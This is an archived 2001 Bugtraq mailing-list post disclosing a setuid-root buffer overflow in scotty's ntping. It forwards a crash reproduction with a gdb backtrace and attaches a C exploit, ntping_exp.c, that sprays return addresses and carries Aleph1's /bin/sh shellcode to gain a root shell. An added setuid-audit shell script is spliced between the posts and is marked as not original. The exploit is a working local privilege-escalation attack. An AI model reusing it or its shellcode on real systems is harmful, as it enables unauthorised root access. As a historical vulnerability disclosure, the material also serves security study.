6655738 2001-06-21 10:55 -0400 /91 lines/ Larry W. Cashdollar <lwc@Vapid.dhs.org>
Sent by: joel@lysator.liu.se
Imported: 2001-06-22 02:45 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17547>
Subject: suid scotty (ntping) overflow (fwd)
------------------------------------------------------------
This has circulated on vuln-dev; not sure if it made it here yet.
The vendor has been notified and has released a fixed version, 2.1.11.
My exploit:
http://vapid.dhs.org/ntping_exp.c
There is a much better exploit out there, but I am not sure if I have
permission to distribute it. So I will leave that to the author.
Credit: KF <dotslash@snosoft.com>
---------- Forwarded message ----------
Date: Tue, 12 Jun 2001 05:34:16 -0400
From: KF <dotslash@snosoft.com>
To: vuln-dev@securityfocus.com
Subject: suid scotty (ntping) overflow
I am not sure that this made it on to the list the first time I sent
it... so sorry if this is a duplicate.
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/
What led me to research this:
arndt@aorta.tat.physik.uni-tuebingen.de (Michael Arndt) wrote:
> i run scotty-testsuite: what must i change on my system:(Linux
> slackware):
> ==== Test generated error:
> can not connect straps socket: Permission denied
straps and ntping must be installed suid root.
^------- Hrmm I sure thought that was interesting to know *grin*
Vendors affected:
unknown by the author of this document
just a note I found however...
<19990702221232.79B119410@Galois.suse.de>
Hi folks,
here is the long promised posting of all suid/sgid files on an alpha of
SuSE Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-ROMs, so that's the reason for the
many many files ... (and too many suid/sgid ones ...)
...
-rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
...
[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x40079b66 in getenv () from /lib/libc.so.6
#1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2 0x4013b9de in __res_ninit () from /lib/libc.so.6
#3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4 0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5 0x080495b8 in _start ()
#6 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
-KF
(6655738) /Larry W. Cashdollar <lwc@Vapid.dhs.org>/(Reflowed)
Attachment (text/plain) in text 6655739
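The thread makes two defensive points worth acting on: the scotty test suite needs ntping and straps installed setuid root, and the SuSE 6.2 file list shows both shipping that way. The script below is an added example, not part of either post or of the scotty project. It parses an `ls -l`-style listing of the shape quoted above (the sample lines are constructed, mirroring the SuSE entries plus a few non-matching ones), reports the setuid-root executables, prints the `chmod u-s` commands that would revoke the bit so an administrator can review them before running anything, and includes a `find` wrapper for doing the same audit on a live root filesystem. All function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original posts): audit a long-format file
# listing for setuid-root executables and print the revocation commands.

# Constructed sample input, in the format of the quoted SuSE suid/sgid list.
SAMPLE_LISTING='-rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
-rwxr-xr-x 1 root root 12345 Jun 30 11:11 ./usr/bin/scotty
-rwsr-xr-x 1 games games 4096 Jun 30 11:11 ./usr/games/fortune
-rwxr-sr-x 1 root mail 2048 Jun 30 11:11 ./usr/bin/mail.local'

# suid_root_from_listing: read ls -l style lines on stdin and print the path
# of every regular file whose owner-execute slot is 's'/'S' (setuid) and whose
# owner is root.  setgid-only entries and non-root setuid entries are skipped.
suid_root_from_listing() {
    awk '$1 ~ /^-..[sS]/ && $3 == "root" { print $NF }'
}

# revoke_commands: for each path on stdin, print (do not run) the chmod that
# drops the setuid bit, so the list can be reviewed before anything changes.
revoke_commands() {
    while IFS= read -r path; do
        printf 'chmod u-s %s\n' "$path"
    done
}

# suid_root_on_host: the live equivalent of suid_root_from_listing, walking
# the given root (default /) without crossing filesystem boundaries.
suid_root_on_host() {
    find "${1:-/}" -xdev -type f -perm -4000 -user root 2>/dev/null
}

# Demonstration on the constructed listing: expect ntping and straps only.
printf '%s\n' "$SAMPLE_LISTING" | suid_root_from_listing | revoke_commands
```

On a real host, pipe `suid_root_on_host` into `revoke_commands` to get the same review list; the output is deliberately a set of commands to read rather than an action taken, because some setuid binaries are required and the decision belongs with the administrator.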
6655739 2001-06-21 10:55 -0400 /51 lines/ Larry W. Cashdollar <lwc@Vapid.dhs.org>
Attachment filename: "ntping_exp.c"
Imported: 2001-06-22 02:45 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17548>
Attachment (text/plain) to text 6655738
Subject: Attachment (ntping_exp.c) to: suid scotty (ntping) overflow (fwd)
------------------------------------------------------------
/* Larry W. Cashdollar 6/13/2001
   http://vapid.dhs.org Vapid Labs
   Overflows ntping for scotty-2.1.9 based on post by
   dotslash@snosoft.com */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */
#define NOP 0x90      /* no operation, skip to next instruction. */
#define LEN 590       /* our buffer size. */
/* lacks a call to setuid(0) */
char shellcode[] =    /* Aleph1's shell code. */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Nab the stack pointer to use as an index into our NOPs */
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}
int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;
  long retaddr;
  if (argc < 2)
    {
      fprintf (stderr, "usage: %s <offset>\n", argv[0]);
      return 1;
    }
  retaddr = get_sp ();
  /* Fill the buffer with our new address to jump to: esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);
  printf ("Jumping to address %lx BufSize %d\n", retaddr + atoi (argv[1]), LEN);
  /* copy the NOPs into the buffer leaving space for shellcode and
     pointers (left commented out in the original) */
  /*
  for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
    *(buffer + i) = NOP;*/
  /* copy the shell code into the buffer; with the NOP loop disabled, i is
     still LEN here, so this lands just past the end of buffer[] (kept as in
     the original) */
  memcpy (buffer + i, shellcode, strlen (shellcode));
  execl ("/usr/sbin/ntping", "ntping", buffer, (char *) NULL);
  return 0;
}
(6655739) /Larry W. Cashdollar <lwc@Vapid.dhs.org>/-